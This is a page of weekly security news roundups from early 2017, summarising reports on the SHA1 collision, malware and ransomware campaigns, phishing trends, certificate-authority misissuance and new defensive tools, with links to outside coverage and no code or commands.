Security Roundup - 2017-02-23

I am sure no one missed the death knell of SHA1 as a security hash today, as Google has announced a practical SHA1 collision. Set to be unveiled in 90 days, allowing those stragglers that still haven’t updated, despite warnings from Google over the last several years, the attack is apparently 100K times faster than a brute force on a SHA1 hash making it only a matter of time before it if even cheaper.

RSA wrapped up last week, and Brian Krebs reports on an overlooked announcement with big impact. Apparently, researchers at RSA announced a breach by a company selling log management tools, where the update server was compromised for two weeks, in 2015 and clients automatically downloaded a compromised version of the software. RSA investigators discovered this in 2016 during an investigation and believe a number of organizations may still be compromised.

A frightening new persistent threat called ‘Operation Bugdrop’ was uncovered this week. The malware operates by controlling the microphone of the infected machine and uploading the data elsewhere. So far, more than 70 targets across a variety of industries, with most located in the Ukraine.

PhishingLabs has released their 2017 Phishing Trends Report. Highlights include: one million confirmed malicious phishing sites in 2016, 7800 phishing attacks investigated and/or mediated by Phishing Labs every month, and the top 5 targeted industries had an average 33% growth in attacks year over year. They expect Cloud Storage Services to be the number one target by end of year, supplanting the financial industry which is actually showing a decline. Finally, phishing attacks targeting people as the IRS in 2016 resulted in more phishing attempts than all of 2015 combined. With tax season underway, be wary!

This week Australia expanding its Breach Notification policy, while Canada is preparing new legislation requiring prompt breach notifications.

Chrome extensions can do fairly powerful things, and MalwareBytes covers how one malicious extension can abuse current abilities and make it extremely hard for the average user to uninstall. The extension in question enables a tech support scam, as well as connects to a C2C to potentially execute other code.

BleepingComputer has a nice rundown of Ramnit’s return from the 2015 takedown attempt. Unfortunately, it looks like as of 2017 it has reached the top 5 of active banking trojans.

Netflix released a project this week focused on ‘User Focused Security’. Called ‘Stethoscope’, the tool empowers users to go to a website, which will figure out some device information and provide actionable results and education for the user.

Dropbox also released a security focused product this week with SecurityBot. SecurityBot is chatbot that enables faster incident detection and resolution by automatically asking users to verify certain actions (like running sudo accidentally on a machine they don’t have permissions), allowing security to escalate quickly if the user indicates they did NOT perform said action. This allows Dropbox security to deal with false positives quickly, without necessarily requiring the security team to manually follow up on each signal, or ignore certain signals just because some individuals generate a high rate of false positives.

In ransomware, BleepingComputer provides coverage of a new ransomware family being reverse engineered live. The ransomware in question, Hermes, contained an randomization seed that could be attacked to create a decryptor for the malware.

Things to watch:

Wired reports on a newly reported memory attack that allows attackers to circumvent memory randomization efforts in modern operating systems. Being executable from Javascript in the browser, the attack relies on being able to measure operations of memory writes for a program to figure out where in memory it is, allowing them to potentially execute other memory corruption actions with greater certainty.

Security Roundup - 2017-02-15

RSA is happening this week, and some interesting things are coming out of it. The most interesting to me so far is Google apparently talked about BeyondCorp their 6 year mission to allow employees to work from untrusted networks without a VPN. Rather than relying on VPNs, BeyondCorp relies on over a dozen metrics to decide access for a user for a specific resource, allowing for dynamic policies vs static policies.

As a companion piece to the above, O’reilly posts a conversation with an SRE at Stripe on Zero trust networks.

Sucuri has released their monthly lab notes, and there are some interesting gems. First is a note on bad actors masquerading malicious scripts as image files, to evade casual investigation of logs/traffic. Second, they cover some techniques malicious actors use to spread backdoors/malware/etc on shared hosts, expanding their influence quickly due to lack of security for one neighbor.

Brian Krebs follows up on the LeakedSource takedown, by assembling some clues on who might have been behind the site.

A self-healing malware strain has been found in the Magento platform which uses SQL triggers to see if it has been cleaned up and re-installs itself if so.

Another bad news day for Yahoo as they announce that some accounts might have been accessed without a password in 2015 or 2016, using forged cookies generated by a tool internal to Yahoo.

Following last week’s Wordpress API security flaw, it is reported that up to 1.5 million Wordpress sites have been defaced, despite security features that would update a percentage of sites and additional security plugins that were intended to mitigate the problem. More than a dozen different defacement campaigns have been detected as of this writing.

This week I learned that some Ransomware is delivered via brute force RDP attacks, where the attacker breaks into machines via exposed remote desktops and manually executes malware. Sadly, this method appears to be on the rise.

Akamai has released their Q4 State of the Internet Report this week. Overall DDoS attacks were down QoQ, which they attribute to the various Botnets fighting over resources vs performing actual attacks. However, web application attacks were up QoQ, with SQLi attacks growing the most in that time period. Unsurprisingly, they expect IoT botnets to increase in the near future.

Speaking of the internet of things, BleepingComputer posts an interesting story where smart devices at a university were hijacked, causing the botnet to accidentally overwhelm the network with traffic. To the university’s credit, they had the smart devices segregated in a separate network, preventing the infection from spreading out of the network.

Sophos Labs has released their Malware Forecast report. Unsurprisingly, IoT devices are ALSO at the top of this list. Also highlighted, Android malware and macOS malware being on the rise,

Finally, Talos Intel has an analysis on the AthenaGO malware strain. This malware is interesting for a few reasons. First being the language (Golang), which is not commonly used for malware. The second is its use of Tor2Web proxies, to communicate to C2C nodes on TOR without having to install TOR on the infected machine. This provides some additional anonymity to the attacker, though does allow for blocking at the proxy level.

Security Roundup - 2017-02-09

Kaspersky details a sophisticated malware attack , where attackers used a variety of free tools to load programs directly into memory and grant remote access. This allowed attackers to obscure their identity, as well as made it harder for their work to be detected. Kaspersky states this is getting more common, making memory forensics something to consider.

For some more benign hacks due to devices exposed to the internet with default passwords:

IP streamers used to play music for radio stations was compromised to play a specific song for 15 minutes. Rapid 7 also did some extra digging and provides details.

One prankster caused a number printers to print out messages telling users that their device was part of a botnet.

Also a few unauthenticated API exploits were noticed this week:

The first is in McAfee ePolicy Orchestrator, which would allow an attacker to dump information from the server, or pretend to be a client in order to dump information about the client.

Honeywell SCADA controllers had a number of bugs which allowed an attacker to retrieve a password in plain text and then use it to log in.

Sophos disclosed a subtle bug in the new Wordpress API system that would allow someone without privileges to update any blog post. This vulnerability has been patched, but after the word got out plenty of Wordpress instances were defaced.

In other news:

SSL hits a big milestone, where now more than 50% of user traffic (according to telemetry data from Firefox) is now encrypted. This is, in large part, due to more large players encrypting all of their traffic by default, but indicates that using SSL only is becoming the norm, rather than the exception.

Etsy has an in depth article on the many steps they make to ensure Private TLS certificates they use are secure, which is interesting for any system where you need to keep information particularly secure.

Ars Technica has an article on how Google took on Mirai by admitting to Project Shield. The article provides some additional insight into what sorts of attacks they were seeing, once Google took over.

Meanwhile, Mirai apparently received an update, now targeting Windows! Infected Windows agents are used to figure out passwords of other systems and spread the botnet. Also apparently part of it are breaking into databases, presumably to steal information.

Following the success of bug bounty programs for public companies, reports indicate that some dark net markets are doing the same.

Checkpoint indicates they are seeing a resurgence of Slammer, the worm that was primarily active in 2013 and has been largely dormant since.

Security Roundup - 2017-02-02

Think last year was a bad year for modems? A security researcher from Trustwave Security details how he found a bug in his router that impacted 31 different Netgear routers overall. Sadly, part of his research involved finding two publically disclosed exploits for similar flaws in 2014 and expanding on that work. Netgear responded to this responsible disclosure and has issued patches for the affected devices.

Trustwave Security also increased my knowledge about SVG this week with their article on how SVG can actually contain Javascript and be used to execute remote payloads as a result.

In more device security news, Threatpost reports on a printer flaw that allows an attacker to extract information, including documents and credentials, remotely. They achieved this using a combination of “Cross Site Printing” and CORS spoofing to make a user’s browser act as a relay to exfiltrate data.

Akamai has been doing research into credential abuse, specifically scenarios where a botnet is working to avoid standard security controls. In these scenarios an individual website is unlikely to detect this behavior, since volumes are low and attempts are spread out across ips, accounts and time. However, when viewed in an aggregate across a number of sites they are protecting, Akamai was able to detect a number of sources and targets and increased detection of these attacks more readily than single site observation would.

LeakedSource, a website that obtained breach data and sold it openly was taken down this week. Troy Hunt, owner of HaveIBeenPwned, provides his thoughts on the service and the takedown. In his article, Troy is critical of the LeakedSource model where anyone could pay and get personal details from leaks. He points out a number of instances where this information has clearly been used maliciously (in Ourmine account takeover ways), and suggests that LeakedSource was also incentivizing attackers to find and turn up more data.

Google has just announced that they will now operate their own Root Certificate Authority, as well as aquiring two existing root CAs from GlobalSign. Among other things, this will allow Google tighter control over who can generate ‘official’ Google certificates, as their products could check the entire certificate chain, rather than just trust existing root CAs. With CAs like StartCom issuing rogue certificates, and even well known CAs like Symantec and GlobalSign having issues with certificates in the last year, it is understandable that a company like Google has shifted towards wanting more control over the security of all their properties.

Ars has an interesting article suggesting that Antivirus is making it harder to secure the browser. In this article, several browser engineers have pointed out where security protections have been delayed/had problems due to Antivirus hooking into and in some cases disabling functionality. An additional observation, supported by a number of vulnerabilities last year, is that the addition of anti-virus provides a larger attack surface.

In ransomware, BleepingComputer provides two terrible infection stories. In one, a police department lost up to 8 years of digital evidence, with some data having backups but recent data likely not. The second was for a hotel where the infected computer was also used to provision key cards for electronic locks. Since this only impacted the generation of the key, no customers were actually impacted.

Want to learn more about the new Locky Bart versions? Malwarebytes does an in depth analysis of the inner operations.

Talos Intel recently analyzed a malicious attachment apparently aimed at some government officials. They go into detail on the several layers of complexity the payload goes into in order to execute (doc file, with flash that executes actionscript) as well as some methods it used to avoid casual analysis.

For further in depth malware analysis Talos also disects EyePyramid, a malware sample that had remained undetected for a few years.

Security Roundup - 2017-01-26

Some missed news from last month: an incident response worker did a 2016 review on learning from security breaches. Some high level lessons:

  • Centralized logging makes problems much easier to track down.
  • Root causes might not be found.
  • If you rely heavily on third party technology, evaluate it for risk.
  • Most organizations he visited did not have a good secrets management solution.
  • Companies with higher tech debt also correlate with companies with high security debt.

The EFF put out an update on the Technical Developments in Cryptography, covering backdoored crypto, the finalization of TLS 1.3, a review of crypto attacks in 2016, as well as the strengthening of HTTPs.

Symantec-owned certificate authorities have been found to have violated SSL Certificate issuing guidelines for 108 certificates. 9 of these certificates were issued to people that were not controllers of the domains in question. Many of these appear to be ‘test’ certificates and were promptly revoked, but could still have been used for malicious behavior, especially as browsers are generally not able to deal with issuance and revocation of certificates in real time. These violations were apparently only discovered via Google’s Certificate Transparency project.

Hack The Army started up at the end of last year, and TechCrunch provides a story of some of the initial results.

Use Cisco WebEx? You might want to check that the extension is up to date, since older versions contain a remote execution vulnerability, allowing for computers to be taken over just by browsing a specially crafted page. Sophos gives you a breakdown.

Engineers at recently built a tool to find secrets in Android apps. After analyzing 16K applications, they decided to write up some findings. Unsuprisingly, quite a few applications had hard coded some sort of api token in the application. has released an updated Heartbleed report, indicating that 200K servers are still susceptible to CVE-2014-0160 (yes, Heartbleed is now 2 years old).

BleepingComputer reports on a banking ransomware that had its source code leaked. Initial investigation seems to indicate it has already been modified into banking trojan.

Speaking of modified versions, Checkpoint Security warns of a new version of HummingBad, called HummingWhale. They have already contacted Google to take down a number of apps, and shares their overall findings.

Finally, BleepingComputer details how members of the MalwareHuntingTeam are being harassed on VirusTotal, presumably by malware authors that MalwareHuntingTeam has exposed.

Page 11 of 23